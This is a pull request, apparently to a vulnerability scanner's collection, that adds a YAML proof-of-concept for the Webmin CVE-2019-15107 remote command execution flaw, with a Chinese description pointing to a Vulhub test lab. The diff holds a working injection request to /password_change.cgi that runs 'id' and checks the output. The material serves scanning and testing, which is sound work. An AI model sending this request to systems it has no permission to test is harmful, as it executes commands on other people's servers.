### PR TITLE
add poc for webmin

### DIFF
--- a/pocs/poc-yaml-Webmin-CVE-2019-15107-RCE
+++ b/pocs/poc-yaml-Webmin-CVE-2019-15107-RCE
@@ -1,11 +1,7 @@
-name: poc-yaml-Webmin-CVE-2019-15107-RCE
+name: poc-yaml-webmin-cve-2019-15107-rce
 rules:
   - method: GET
     path: /password_change.cgi
-    headers:
-      User-Agent: >-
-        Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
-        Trident/5.0)
     body: user=roovt&pam=&expired=2&old=id&new1=test2&new2=test2
     follow_redirects: false
     expression: |
@@ -21,5 +17,6 @@ rules:
       r"uid=\d{1,5}\(.{0,50}\) gid=\d{1,5}\(.{0,50}\)
       groups=\d{1,5}\(.{0,50}\)".bmatches(body)
 detail:
+  author: danta
   description: Webmin 远程命令执行漏洞（CVE-2019-15107）
   vulhub: https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107

--- a/pocs/poc-yaml-Webmin-CVE-2019-15107-RCE
+++ b/pocs/poc-yaml-Webmin-CVE-2019-15107-RCE
@@ -1,0 +1,25 @@
+name: poc-yaml-Webmin-CVE-2019-15107-RCE
+rules:
+  - method: GET
+    path: /password_change.cgi
+    headers:
+      User-Agent: >-
+        Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+        Trident/5.0)
+    body: user=roovt&pam=&expired=2&old=id&new1=test2&new2=test2
+    follow_redirects: false
+    expression: |
+      status == 200
+    search: <tt>(.*?)/password_change.cgi<\/tt>
+  - method: POST
+    path: /password_change.cgi
+    headers:
+      Referer: "{{1}}"
+    body: user=roovt&pam=&expired=2&old=id&new1=test2&new2=test2
+    follow_redirects: false
+    expression: >
+      r"uid=\d{1,5}\(.{0,50}\) gid=\d{1,5}\(.{0,50}\)
+      groups=\d{1,5}\(.{0,50}\)".bmatches(body)
+detail:
+  description: Webmin 远程命令执行漏洞（CVE-2019-15107）
+  vulhub: https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107


### PR DESCRIPTION
如果你的 poc 符合以上要求，请填写下列信息

## 本 poc 是干什么的
Webmin 远程命令执行漏洞（CVE-2019-15107）

## 测试环境
Vulhub的环境：
[https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107)](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107)

## 备注
由于POC编写不支持Referer字段自动填入当前的URL地址，所幸找到一个方法可以获取到URL：）
建议增加Rerferer的支持。